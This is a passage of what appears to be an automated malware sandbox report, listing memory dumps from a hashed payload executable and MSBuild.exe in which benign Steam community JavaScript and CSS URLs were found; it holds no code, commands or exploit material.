00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=Dbzy
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=Q4LAS9-JZwft&l=e
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 